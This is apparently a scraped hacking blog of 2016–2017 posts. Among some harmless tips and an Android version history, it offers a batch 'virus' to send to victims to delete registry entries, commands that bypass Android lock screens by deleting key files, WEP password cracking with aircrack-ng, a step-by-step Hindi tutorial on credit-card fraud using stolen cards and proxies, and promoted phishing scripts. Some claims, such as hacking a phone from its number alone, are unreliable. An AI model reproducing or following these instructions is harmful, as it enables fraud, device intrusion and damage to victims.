Showing posts with label Phone device. Show all posts
Showing posts with label Phone device. Show all posts

Tuesday, 18 April 2017

BEST HACKING WEBSITES OF DARK WEB.




How To Access The Deep Web or Darkweb


The deep web is not a single location, but a whole class of different locations which share one thing in common – that they are hidden from search engines and regular internet users. Different areas of the deep web therefore have different requirements for you to be able to access them, and any technology which you use will only give you access to its specific area of the hidden internet. Having said that, there is a very small number of technologies used to create what is popularly called the ‘deep web’ or ‘darknet’, and one in particular which the vast majority of people use – TOR


Best Hacking Websites on The Dark Net : –

The Art of Human Hacking



Strategic Intelligence Network.


SUMXI


Ranting for the Revolution..

Galaxy2

Hack Canada

Dur69

Hack Group

Hidden Answers




Sunday, 16 April 2017

DANGEROUS VIRUS THAT CAN DAMAGE ANY COMPTER



> Disable Victim Antivirus
by sebding this virus


Open Notepad Copy text from given box and Paste To Notepad










Now Save this code as .bat and send to victim 😀

>Registry Deleter:-







:MESSAGE

ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE

Function:- Once executed it will delete registry files and leave a message. It can extremely affect the victim’s computer.

These Four Lines Of Code (VIRUS) Can Crash Anyone’s Smartphone And Computer

There’s a notorious link being shared on social networking websites that can crash nearly all smartphones — all you have to do is just click on this link. Known as , crashsafari.com (clicking on this will crash your browser), this link crashes your browser by overloading it with thousands of characters in the address bar each second. As a result, the phone memory exhausts and your device crashes.

Back in September, we encountered a similar bug in Google Chrome that caused the browser to crash with just 16 characters. This website link is being spread via apps, social networks, simple URLs, and shortened URLs. It should be noted that this bug isn’t malicious and it doesn’t break anything in your phone.

Devices affected by crashsafari.com;






The bug hits iPhone’s Safari browser in the worst manner possible. If you click on the link, it crashes your iPhone 6S or iPhone 5S running iOS version 9.2.1 or a regular iPhone 6 running iOS 9.2. After about 20 seconds, it’ll force the iPhone to reboot and heat up the device.

Even though the new bug is called crashsafari, it affects Android phones and Google Chrome as well. Apart from phones, this bug also affects desktop browsers if your computer doesn’t have enough RAM and CPU power.

How does crashsafari.com work?

crashsafari iphone bug



The website is running a small piece of JavaScript that creates a loop with the help of History API and crashes your device. The History API allows the websites to change the URL of the page without performing page refresh.

If you are an iPhone user, you should be very careful about any new incoming shortened links as they could forcibly reboot your phones. Notably, these links have already been opened 100,000 times. You are advised to take extra care as it’s being spread on the web via misleading links.

Saturday, 15 April 2017

HACK ANDROID PATTERN LOCK BY 7 METHODS'''...








METHOD I



Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc…) Installed:

INSTRUCTIONS:



1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard
(using your PC, as you cant get into your phone, right )
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done!


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.





METHOD 2

Solution For Everyone Without Recovery Installed – ADB:

What You Need:


=>A computer running a Linux distro or Windows+Cygwin
=>USB cable to connect your phone to the PC
=>Adb installed


How to install adb:

1. Open Terminal
2. Type:

“sudo apt-get install android-tools-adb”
-> Hit [Enter]


3. Follow the instructions until everything is installed.

INSTRUCTIONS:

1. Connect you (turned on) Phone to the Computer via USB.
2. Open a terminal window.
3. Type:

adb devices
adb shell
cd data/system
su
rm *.key

4. Done.. Now You Just Have To Reboot.


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 3

Solution For Everyone Before Lock Accident :

SMS Bypass – Download IT FROM PLAYSTORE N INStall It On DEVICE.
This App Allows You To Remotely Bypass Your Phone’s Screen Lock By Sending A SMS.
It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
SMS Bypass App Requires Root.

INSTRUCTIONS:


1.First, make sure you give permanent root access to the app.
2.Change the secret code to your preferred choice. The default password is : 1234
3.To reset your screen lock, send the following message from another phone:


secret_code reset

example

1234 reset

Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset – Your phone will restart and your lock screen will be reset.
Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 4

Solution For Everyone Via Adb – SQL Command :

INSTRUCTIONS:


=>Type This Commands Separated In Your Terminal (CMD Prompt) :

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.quit

=>Now You Just Have To Reboot.


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 5

Solution For Everyone Via Adb – File Removal :

INSTRUCTIONS:


=>Type This Command In Your Terminal (CMD Prompt) :

adb shell rm /data/system/gesture.key


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 6

Solution For Everyone With USB Debugging Enabled :

INSTRUCTIONS:

Primary Step for all method:

Download & Extract to anywhere – Bypass Security Hack (Download from attachments)
Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
Navigate to Browse data tab, At table there, click to list down the selection & select secure.

Instruction To Remove Pattern Lock:

Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone

Instruction To Remove PIN Lock:

Now, Find Or Create lockscreen.password_type, double-click & change it’s value to 65536, Apply changes!
Now, find lock_pattern_autolock, Delete Record, If doesn’t exist, Ignore
Close & save database
Run push settings.db.cmd and reboot your phone

Instruction To Remove Password Lock:

Now, find lockscreen.password_salt, Delete Record
Now, find lockscreen.password_type, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 7

Solution For Everyone With Recovery Installed :

INSTRUCTIONS:

1.Download and Copy Aroma File manager.zip (Download from playstore)to your memory card.

2. Open your recovery (press volume Down + Power button or it can be different according to the phones. Generally the phones who have pressable button on the middle they have to press all three buttons. Google for you pattern there are lots)

3. There’ll b an option in recovery called “mount”. Go in that option and then mount all the cache and everything it is there.

4. Then select “update” and select “apply update from SD/external” and select aroma file manger.zip file that you downloaded using above QR code above.

5. After Flashing or updating, the aroma file manager will open. Use volume keys for up/down and power button 2 select like you use to get into recovery.






6. In aroma File manager , Go to menu , which is located in bottom strip and then select Settings.

7. Go to bottom n select “mount all partition in startup ” then exit from aroma file manager.

8. Now after exit, re-update that aroma file again and it will open again.

9. Go to data >> and then System.
Then find ‘gesture.key’ (for pattern lock) and ’password.key’ (for password lock) then long touch on gesture.key or password.key and sum option will be prompted , choose delete and delete that file and restart.


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.






Saturday, 4 February 2017

HOW TO INSTALL KALI LINUX IN ANDROID




Hello Friends !



In this post i am going to tech you how to install Kali Linux on android smartphone easily without any complicated steps and hassle.


Step 1: You have to make sure that your phone is rooted properly without any issues, if its not then its the time to root your device.

Step 2: Now download two applications from Google Play Store Linux Deploy & Vnc Viewer as shown below from the given link





























Step 3: Now Open Linux Deploy and tap that download button as shown in the picture,




Step 4: Now Select Distribution as Kali Linux and Go Back




Step 5: Now Tap on Three Dots on top right corner and Tap Install, it will take some time because your phone is going to download an image of kali linux (2GB Approx.) after that just hit start on the main screen and minimize the app.


Step 6: Open vnc viewer and configure it my typing the password and name (get password from your linux deploy’s settings and use any name eg. kali)








Now tap Connect and Enjoy your kali linux

Tuesday, 11 October 2016

How To Hack Android Phone Using Bluetooth (100% working)

How To Hack Android Phone Using Bluetooth 20161011-174934.jpg

Hello guys, today i am share with you how to hack android phone using Bluetooth.There are many types of Bluetooth Softwares to hack android phones.These software are very efficient and can hack any Bluetooth enabled device without any prior knowledge of user.

BLUETOOTH

20161011-175028.jpg

Hack Android Phone Using Bluetooth: Bluetooth is a wireless technology which lets us connect to other android devices and share information or different files such as music files, photos, videos, etc. With increase in its popularity now-days, we can see every android phone is Bluetooth enabled. Other than just sharing information or files between android devices.

Mostly people are unaware about Bluetooth with a term of hacking and due to this people loses their imp data , credit card numbers and lots of other thing which are value able.Now it become very easy to hack someone android phone using Bluetooth. We can do many tricks with this Bluetooth; the major one is hacking others android phones with Bluetooth hacking Softwares.

Though you may find all these 8 mobile Bluetooth hacking softwares have common features such as all softwares let us access other’s phone contacts, messages, profiles, etc. but still they are different from each other in one or some other unique ways. So, let’s try using these bluetooth android phone hacking softwares but only for fun.

1. Super Bluetooth Hack 1.08 20161011-175055.jpg

Hacking somebody’s android phone via this Super Bluetooth Hack 1.08 software will let you take full control and command of that android phone. In other words, you can gain full access to his inbox messages, phone book contacts, call summary, details about SIM and network. Wait! There’s more to it. You can lock or unlock the phone or switch on/off, change accessibility, network or security settings, modify ringing tone and volume, make some changes in language, play ringtones even when the andorid phone is on silent mode, make a call or end a call, etc. Whew! Lot of things you can undertake with this multi-purpose software This software is used for controlling and reading information from remote phone via bluetooth or infra. Phone list and SMS can be stored in HTML format. It will also display information about battery, network and sim card.

2. Blue Scanner 20161011-175116.jpg

As the word scan implies, this Bluetooth Scanner software lets us explore and scan active Bluetooth enabled mobile devices or laptop or PDA with active Bluetooth connection. This software tries to collect maximum information for every discoverable device. It’s a kind of fun social game for hackers wherein points are added in their total score of finding the maximum number of Bluetooth enabled devices. They can view their total score, level, ranking and no. of devices found in the ‘Stats’ section of this software

3. Blue Sniff 20161011-175131.jpg

Blue Sniff is a GUI based software that runs on Linux.Blue Scanner searches out Bluetooth-enabled devices and try to extract as much information as possible for each newly discovered device in other words you can use this one to spy on others who are close to you.

4. Blue Bugger 20161011-175145.jpg

This simply exploits the Blue Bug (name of a set of Bluetooth security holes) vulnerability of the bluetooth-enabled devices. By exploiting these vulnerabilities you can access phone-book, calls lists and other information of that device.Bluetooth attacks or pranks through Bluetooth technology were first started with the software known as ‘Bluejacking’ followed by Bluesnarfing and then Bluebugging. Bluebugger software finds the limitations in phone and then attacks it to gain complete access to the device. Once the android phone is hacked, user can have full access to the phone directory, call details and other data stored on the device. This software was particularly in news for hacking Nokia 6310i phone as the phone model had some flaws related to Bluetooth connectivity.

5. BT Browser 20161011-175207.jpg

BT Browser is a J2ME application which can browse and explore the technical specification of surrounding bluetooth-enabled devices. You can browse android device information and all supported profiles and services records of each android device.

6. BT Crawler 20161011-175241.jpg

BTCrawler software let users scan open and noticeable Bluetooth devices that are in range and execute queries related to service. It particularly scans for Windows Mobile devices. User can also execute service query for their device. This software displays paired devices, name of the device, class of device and even signal strength.

7.Blue Snarfing 20161011-175303.jpg

Blue Snarfing software is used for hacking android phone via bluetooth connection and copying all information including Planner/Calendar, Phone book and SIM contacts, E-mail and messages ,etc.of the hacked device. The device with open and discoverable Bluetooth connection are more prone to be attacked by this software and a "corruption code" to the hacked mobile leading to complete shut down of android phone and making it unusable or unresponsive to the owner

8. Magic Blue Hack 20161011-175329.jpg

Magic Blue Hack allow user to gain control over victim’s mobile but this software cannot be considered as a hacking software as before hacking it asks permission from the victim to accept the incoming connection. Hacking is usually associated with sneaking into other’s device without their consent but this software seeks permission from the owner to accept request for connection. If the request is accepted, hacker can gain control over the phone and can do all the things related to making calls, sending messages, emails, browsing , contacts etc.

So above is all about android hacking or you can say Android Phone Hacking using Bluetooth 2017. If you face any problem at any point do comment below. we'll definitely try to help you

Thursday, 6 October 2016

How To Hack Android Phones Using Hacking Apps 2016 (100%working)

20161007-034433.jpg

Lets Hack Android Phones Using Hacking Apps 2016 Here we are going to discuss the best android hacking tricks to hack into device with Windows PC with hacking tools 2016 to hack device.

See the complete guide explained in the post.

Android mobiles are most popular mobile phone now a days. This is because they are easy to use, customizable, affordable in price and many such reasons. But there is also a bad factor that is bugs and lack of security in android. It is also true that we can’t have both security and customization at there best in one device. We can increase one on the cost of another.

The android is operating system designed by google. it is freely available to use by all the mobile phone companies all over the world. The androids mobile devices generally ranged between Rs.4000 to Rs.70,000. So it is used by most of the world and is most likely to be used by our victim. So in this post we will discuss how to hack android using windows pc with help of victims mobile number.

█████Requirements█████

♥Victim’s phone number.

♥The victim and the hacker need to remain connected to the internet during the entire process of hack.

♥Product must be installed and activated (can also search key on the internet)

█████Steps to Hack█████

#1 Install and run the android sniffing tool.

#2 Enter victims mobile number in mobile number block.

#3 Verify to search for country or you can enter country code with mobile phone.

#4 Click on hack to hack into mobile phone.

#5 Select reports to hack messages, calls, and files.

#6 Select the .rar or .zip format on the right side to select the format of file in which you want to store reports.

#7 Click generate to generate .zip or .rar file of selected reports.

This article is to increase knowledge and make awareness about the threats of the technology. please do not try to hack into anyone’s mobile phone as it is considered as criminal offense under cyber law. and is punishable by law.

If Then there you need any help Must Comment Below Or Message me Freely.









Thursday, 25 August 2016

How To Convert A Webpage To PDF File Simple Trick

How To Save Web Page To PDF File ?

20160826-005024.jpg

1. Open the Google Chrome Browser on your PC

2. Then go to the web page that you want to convert as a PDF.

3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.

4. Now Change the destination to “Save As PDF” and hit the save button.

5. The current web page will instantly be downloaded as a PDF document.

Keep Visiting…! :D :D :D

Friday, 10 June 2016

what is carding? And how hackers do carding? STEPS TO DO CARDING [ in Hindi ]

Carding Crime Hai ye aap apne risk me try kro ge iss me hm responsible nhi hai

Carding kya hai :-

picsart-06-09-03-44-27.jpg

Carding online frod hai iss me aap kisi bhi order ko buy kr sakte ho bina kisi bhi money use kiye ye trick 100% Working hai iss me aap 60000 ka product bhi buy kr sakte ho

Note:- phaile aap kum price oder ki bhi carding kr sakte ho

Requirements :-

1. Android Phone ( Rooted ) Note :- agar aap ke phone me root nhi hai to aap Google se kingroot Downlaod kr sakte ho

20160609-033017.jpg

2. CC ( Working )Note:- cc mtlb hai Credit Card

20160609-033038.jpg

3. droid Vpn Apk

20160609-033053.jpg

4 Full Fat 3G/4G/ WiFi Net Note:- 2G se bhi kr sakte ho pr 3G/ 4G / WiFi se kro ge to better rhe ga

20160609-033108.jpg

5. CC Matching Sock5

20160609-033003.jpg

Sock5 kya hai ( Details me ) :- CC Matching Sock5 Bhout jruri hai kyoki jis Jge ga aap CC mila hai us Jge ka matching hi aap ko Sock5 leni hai Sock5 ek site hoti hai jo Aap ka ip address Ko chhupa leti hai jis se Carding krte time Product site valo ko ye pta na chl jaye ye frod hai or von aap ka cc block na ke de to aap ko Sock5 CC Matching leni hai .

Carding Steps :-

1) Sbse phaile aap kisi Trust Site Se CC Buy Kro

2) CC Se matching Sock5 buy kro Note:- Sock5 CC Matching honi chahiye

3) Ab Aap Apne phone ke Browser ka CLear Data kr

4) Ab Aap Droid Vpn kro or login kro

5) Droid Vpn Me login kr ke aap

Proxy Host = Sock5 Ka proxy dalo

Proxy Port = Sock5 ka port dalo

Proxy Type = Sock5 select kro

6) Ab Aap jo browser use kr rho us ko private mode me on kro or ek Gmail ya email bnao CC Owner ke name se Note:- vo hi name se email ya Gmail bnao jo CC let hue dala tha

7) Ab Aap amazon.in me New Email New Amazon create kro Note:- usi email se kro jo Aap ne CC name se create ki thi

8) Ab vo products Cart me rkho jo Aap ko buy krna hai or 1 hrs ke liye amazon account logout kr do

9) 1 hrs bad aap aap Vaps Se Login kro

Note:- yad rhe ki Sock5 Proxy Connect krna na bhule

10) Ab Aap ne jo product cart me rkha hai us ko Select Karke Appna Name Aur Address dal do

11) Ab Aap PayMt Page me jakr CC select kro Ab CC Se paymt krte time vo aap se vaps CC address mange ge vha pr CC Lete time jo address dala tha vo dal do

↭Ξ﹏﹏Ξ﹏﹏Ξ﹏﹏ NOW DONE ﹏﹏Ξ﹏﹏Ξ﹏﹏Ξ↭ ENJOY

PRODUCT DELIVERY ON TIME HO GYAGA WITHOUT ANY PAYMENT

Imp Note= CARDING IS A CRIME SO DO IT WITH YOUR OWN RISK we are not carding on any site or not have responsible

Wednesday, 8 June 2016

10 Best Hacking Tools Used By Hackers and Pentesters...

10 Best Hacking Tools Used By Hackers and Pentesters

picsart-06-09-02-23-16.jpg

Hello Friends Popular and best hacking tools used by the hackers as well as pentesters for the purpose of hacking. Some tools are open source while some others are closed source.

Top Best Hacking Tools Used By Hackers and Pentesters This is the list of best hacking tools used by Hackers for hacking purpose.Concise Courses conducted a poll for the tools used by the hackers and in this post you will see some of these tools.

#1 Nmap

It is abbreviated as Network Mapper. It is free and popular open source hacker’s tool. It is primarily used for discovery and security auditing. It is being used by thousand’s of system administrators across the world for the purpose of network inventory, inspect open ports manage service upgrade, schedule as well as to inspect host or service up time. There are several advantages of using Network Mapper, one among its advantages is that, the admin user is able to monitor whether the network and associated nodes require patching.

#2 Acutenix Web Vulnerability Scanner

Acutenix Web Vulnerability Scanner automatically crawls your website and it automatically monitors your web applications and detects dangerous SQL injection. It also determines where applications needs to be secured, thus protecting your business from hackers.

#3 Metasploit

Metasploit Project is extremely famous hacking framework or pentesting. It is a bunch of hacking tools that are used to execute different tasks. This tool is primarlarly used by Cyber security professionals and ethical hackers. Metasploit is basically a computer security project or framework which gives the user necessary information about security vulnerabilities.

#4 Owasp Zed Attack Proxy Project

ZAP and is abbreviated as Zed Attack Proxy is among popular OWASP Projects. It is very powerful and easy to use tool that finds vulnerabilities in Web Applications. It is relatively popular tool because of its support and OWASP community. OWASP community is superb resource for those people that work within Cyber Security.

#5 Wireshark

Wireshark is actually network analyzer which permits the tester to capture packets transferring though the network and to monitor it. Wireshark has been for prolonged time and it is now being used by thousands of security professionals to examine networks and troubleshoot for obstacle and intrusions.

#6 Burp Suite

Burp Suite is network vulnerability scanner particularly with some advanced features. There are two commonly used applications with this tool which comprises ‘Burp Suite Spider’ which can list and map out the different pages and parameters of website by inspecting cookies. It is important tool if you are working within cyber security.

#7 THC Hydra

THC Hydra is generally marked as password cracker. It is extremely popular password cracker and consist of operative and highly experienced development team. Basically, THC Hydra is quick and stable Network Login Hacking Tool.It supports numerous network protocols including but not restricted to AFP, Cisco, AAA, Cisco auth, Cisco enable, CVS, Firebird etc.

#8 AirCrack-ng

Aircrack-ng is categorized among WiFi hacking tools. These tools are famous because they are very effective when used rightly. Those persons who are new to Wireless Specific Hacking program, it certain keys cracking and hacking tools which can recover keys when sufficient data packets have been apprehended in monitor mode.

#9 John The Ripper

John The Ripper is the popular password cracking pentesting tools that is particularly used to execute dictionary attacks. John The Ripper has been awarded for having good name. It is often referred as “John”. This tool can also be used to carry out different modifications to dictionary attacks.

#10 Putty

Basically, Putty is not a hacking tool but it very beneficial tool for a hacker. It serves as a client for Ssh and Telney, which can help to remotely connect computers. It is also used to carry SSH tunneling to bypass firewalls.

FOR DETAIL INFORMATION ABOUT ANYONE OF THESE HACKING TOOL'S, PLZ CLICK ON THE NAME OF THAT TOOL'S, THE NEW PAGE WILL OPEN WITH DETAILS

Monday, 6 June 2016

All Types Of Phising Wapka Scripts For Hacking

20160607-025137.jpg

GOOD MORNING 2 ALL MyAiM's MEMBERS ...

HERE IM PRESENTING YOU THE ALL SITES OF WAPKA PHISING SCRIPTS. JUST COPY 1 BOX CODE AND PASTE IT IN UR SITE .

↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓

20160607-025100.jpg

Autoliker Phishing Code for Facebook---⬇⬇⬇

Paytm Phising Script---⬇⬇⬇

Simple Facebook login page code---⬇⬇⬇

Autoliker Facebook Phishing Code---⬇⬇⬇

Autoliker Phishing Code for Facebook level 2---⬇⬇⬇

Teen Patti phishing code---⬇⬇⬇

Gmail phishing code---⬇⬇⬇

20160607-024843.jpg

★★★FOR MORE JUST VISIT MY WEBSITE DAILY AND GIVE ME MORE SUPPORT★★★★

A History of Android, From Cupcake to Marshmallow..

picsart-06-07-12-51-58.jpg

Android was born on November 5, 2007. Since then, it’s grown up to be one of the most dominant operating systems in the world. But that didn’t just happen overnight. Like all of us, Android went through some awkward years and learned some hard lessons before becoming the OS it is today.

Here’s a retrospective showing how we got to where we are. --------------------------------------<<>>----------------------------------------

picsart-06-07-12-53-10.jpg

1. Cupcake (Android 1.5)

Android had some alphas and betas for T-Mobile’s G1 before this release, but cupcake was its first confectionary-named operating system. We got lots of fun stuff in this update, including support for third-party virtual keyboards and the ability to upload videos and photos to YouTube and Picasa. Oh, and it also got widgets!

Cupcake made the T-Mobile’s G1 something to behold (at least for 2009), but this was just a humble beginning. Android had tons of work to do.

2. Donut (Android 1.6)

Android Donut was the OS that started making others for sake their Palm Pres and start taking Android more seriously. This update brought along universal search, text-to-speech superpowers and CDMA compatibility.

The update began pushing out to all possible handsets on October 1, 2009.

3. Eclair (Android 2.0)

For Eclair, the camera got a little TLC with some much needed flash support, digital zoom, and white balance features to name a few, and how about them live wallpapers! Google also put some thought into a smarter keyboard that could select contact names as suggestions. Not the biggest update in Android’s history, but perhaps one the more deliciously named.

4. Froyo (Android 2.2)

With Froyo, it was all about speed.

" The speed boost in 2.2 is fantastic, but what makes Froyo a truly great update is that it tightens bolts all across the entire platform. Android has evolved into a real product, on a totally different level than its first year….Android 2.2 is the first version of Android that feels totally complete—it performs like it should and it has most of the features it should. It’s not quite at the point my mother could use it without a precarious learning curve, but you can see how it’s going to get better. It’s safe to say that with Froyo, Android has become something that most people really can use—and love. "

The design was still a little clunky compared to the more streamlined and elegant competition, but simple things like adding a bottom dock for quick access to the dialer and app drawer started showing how Android was making a slow crawl toward user friendliness.

5. Gingerbread (Android 2.3)

Where the last few updates had been all about function, Google finally took a moment to look at form in late 2010. The user interface was overhauled with a darker theme that also continued Android’s speed uptick. But that didn’t mean new features completely disappeared. Android added support for NFC, the super useful download manager, and even simple things like improved copy and paste.

Unfortunately, this was when software skinning was in full swing and stock Android began to recede into the background. Only a handful of handsets, like the Google Nexus S, the Nexus One, and the T-Mobile G2, even saw these changes as designed above.

6. Honeycomb (Android 3.0)

Honeycomb primarily focused on one thing and one thing only—tablets. The iPad released only months earlier in the fall of 2010, and Android needed an OS that could compete in a bigger form factor not fit for your pocket. This included what Google called a “Holographic” interface and a more intuitive keyboard for bigger devices.

7. Ice Cream Sandwich (Android 4.0)

ICS reoriented toward the mobile phone with an updated interface and the complete dissolution of hardware buttons. This means we finally got the actions bar and the ever-important recent apps button (how did we ever live without it?!). The design was really a merger of Android’s tablet OS (Honeycomb) and the mobile OS (Gingerbread, Froyo, et al). Apps were more powerful, multitasking was now front and center, and you could start to really see the computer-class power that were being packed inside smartphones. In fact, we were so impressed that we called it “Android’s most significant upgrade to date.”

8. Jelly Bean (Android 4.1)

GOOGLE NOW! Seriously, it’s my favorite feature of Android and was the release where I started looking at my iPhone 3GS with disdain. Jellybean had a super-improved voice assistant when searching and notifications finally didn’t suck, offering much more context from the drop-down menu.

The homescreen also got revamped because now widgets could be resized and placed anywhere. Android was more customizable and powerful than ever.

9. KitKat (Android 4.4)

It would be more than a year until Android moved on to its next big release (though Jellybean was continuously upgraded up until the summer of 2013) and launched its KitKat update with the Nexus 5 on Halloween in 2013. Google Now was now better than ever with some prescient abilities that tried to guess what users wanted before they even asked, and Hangouts was upgraded with some much-needed SMS capabilities.

Most importantly, KitKat slimmed down the OS’s footprint, meaning devices with only 512MB of RAM could run the OS smoothly. This came in handy for Android’s push into cheaper phone markets with its Android One program.

0. Lollipop (Android 5.0)

Hello Lollipop and hello modern Android. Lollipop’s biggest claim to fame was its dramatic reimagining of the Android operating system that started all the way back with Ice Cream Sandwich. Icons, animations, and the multitasking menu were completely redone with Google’s Material Design approach, and the Android lockscreen became much more useful with better notification integration. Google continued opening up Google Now to third-party developers and thankfully added “silent mode” back in for notifications.

This was the the design future for Android, and one that Google continues today.

A. Marshmallow (Android 6.0)

And now we finally arrive at Android Marshmallow, which is all about maintenance and not so much a makeover. But it does come with some awesome additions, including a new way of handling app permissions, a new and improved Google Now, and official fingerprint sensor support. Google’s also improved battery life with Doze and bundling in the Android Sensor Hub in its latest Nexus smartphones, meaning you should be able to survive the day without needing to pull out a charging cable.

picsart-06-07-12-55-01.jpg

Sunday, 5 June 2016

Method 2 for Hack WiFi PWD via mobile..

WEP Routers

20160606-023632.jpg

1

Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be ROOTED . The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:

Nexus 7

Galaxy S1/S2/S3/S4/S5

Galaxy y

Nexus One

Desire HD

Micromax A67, etc......

20160606-023650.jpg

2

Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website. To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of This Article goes into more detail.

20160606-023711.jpg

DOWNLOAD BCMON FROM Here

3

Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported. Your device must be rooted in order to run bcmon.

4

Tap "Run bcmon terminal". This will launch a terminal similar to most Linux terminals.Type airodump-ngand tap the Enter button. AIrdump will load, and you will be taken to the command prompt again. Typeairodump-ng wlan0 and tap the Enter button.

5

Identify the access point you want to crack. You will see a list of available access points. You must select am access point that is using WEP encryption.

6

Note the MAC address that appears.This is the MAC address for the router. Make sure that you have the right one if there are multiple routers listed. Jot this MAC address down. Also note the Channel that the access point is broadcasting on.

7

Start scanning the channel. You will need to collect information from the access point for several hours before you can attempt to crack the password. Typeairodump-ng -c channel# --bssid MAC address -w output ath0 and tap Enter. Airodump will begin scanning. You can leave the device for a while as it scans for information. Be sure to plug it in if you are running low on battery. Replace channel# with the channel number the access point is broadcasting on (e.g. 6). Replace MAC address with the MAC address of the router (e.g 00:0a:95:9d:68:16) Keep scanning until you reach at least 20,000-30,000 packets.

8

Crack the password. Once you have a suitable number of packets, you can start attempting to crack the password . Return to the terminal and typeaircrack-ng output*.cap and tap Enter.

9

Note the hexadecimal password when finished. After the cracking process is complete (which could take several hours), the message KEY FOUND! will appear, followed by the key in hexadecimal form. Make sure that "Probability" is 100% or the key will not work.[2] When you enter the key, enter it without the ":". For example, if the key was 12:34:56:78:90, you would enter1234567890.

DOWNLOAD BCMON By clicking here

Rs. 5 PER REFER AND 0.005 (20 PAISA) WHEN YOU UNLOCK YOUR PHONE (ON EVERY UNLOCK ON YOUR PHONE )

Rs. 5 PER REFER AND 0.005 (20 PAISA) WHEN YOU UNLOCK YOUR PHONE (ON EVERY UNLOCK ON YOUR PHONE)

20160606-012816.jpg

Slide - Earn Free Recharge!

HELLO FRIENDS

M BACK.....MyAiM Vikas

HERE IS A VERY INTERSTING WAY TO EARN MONEY IN YOUR SLID APP

1. DOWNLOAD SLIDE APP FROM - HERE

20160606-012832.jpg

2. EARN 5 Rs. WHEN YOUR FRIEND JOIN FROM YOUR REFREAL AND YOU ALSO GOT 5 Rs. IN YOUR SLIDE WALLET.

20160606-012848.jpg

3, YOU EARN 0.005 ( 20 PAISA) EVERY TIME WHEN YOU UNLOCK YOUR MOBILE.

1.jpg

4. YOU CAN RECHARGE OR BILL PAYMENT OF ANY MOBILE NO.

5. MINIMUM REDEEM Rs. 50 .

SO JOIN SLIDE APP FROM :- HERE AND EARN UNLIMITED MONEY BY REFER YOUR FRIEND. AND EVERY TIME WHEN YOU SLIDE UNLOCK YOUR MOBILE PHONE.

Sunday, 22 May 2016

How to convert Android phone to iPhone with one click !!

Tired of your phone's interface? Do you wish to get iphone But you like the advantages and the applications on the android system? Do you want to work on iPhone interface and Android system at the same time?Okay, in the topic of this day I will give you a very simple method will allow you to do all of this and with one click on the button.

20160522-202827.jpg

in this topic I want to give you Clean UI application it's FREE and available on google play Store with more than one million downloads. This application will allow you to change the look of your phone to iphone using only the iphone interface, and it will cost you only one click on the button

20160522-202841.jpg

After downloading the application (download link below the topic) you'll find that your system interface has changed to iphone interface, and just take some time to explore this new interface and in the case if you like it this is good, and if you don't, you can do "Uninstall" for the app

20160522-202859.jpg

download link : CleanUI

Easy way to make your smartphone sound very clear and pure | You will not believe!!

Actually, most of the smartphones have the same problem with a weakness volume even they have loudspeaker, so in this topic I will share with you a new technology installed on your smart phone so you will hear unusual sound and you've never been heard it before where this method works on Android and succeed with 4.4 versions and above

pure-sound.jpg

without taking a lot of time let's start, so all what you want to do is download the Flashify application and you need to be rooted, where this method does not work without Root But if you want to make Root for your device you can search on my blog and just write "Root" where you'll find several topics about this subject, after downloading the Flashify application and install it, you must download the Zip file for special technique Dolby Atmos Where you'll find the download link below the blog after you install it open the app and click on Zip file option and then chose Dobly Atmos file, and then choose your Recovery type, and here you should be available on recovery And it is very simple when you have root then you can choose the recovery type you have and click on Yup, and finally choose use provided option (you can install any recovery type on your device via the Flashify app)

screenshot-20160427093450.png

Immediately after this your phone will restart, but this time, you will wait a little bit where it will be access to Recovery mode and Dolby Atmos technology will be installed automatically. Do not worry! After that your phone will turn on, and then look at the list of applications you have to find an application called Dolby atmos login to it and turn it on by clicking the On button to be adopting Dolby Atmos technology on your phone and granting your phone the pure and fabulous sound and you have never got it before.

get-dolby-atmos-surround.jpg

download link for DOLBY ATOMS

download link for FLASHYFI

How to take long screenshots on your smartphone !!








Sometimes you may want to take a screen shot for a long conversation on what's app application or on any another app, but of course, the screen shot will not contain the entire conversation, for this, you should take screenshot several times and also if you want maybe to put them into one picture by using photoshop program. So Today you can do it so quickly in just a few minutes.

20160522-191819.jpg

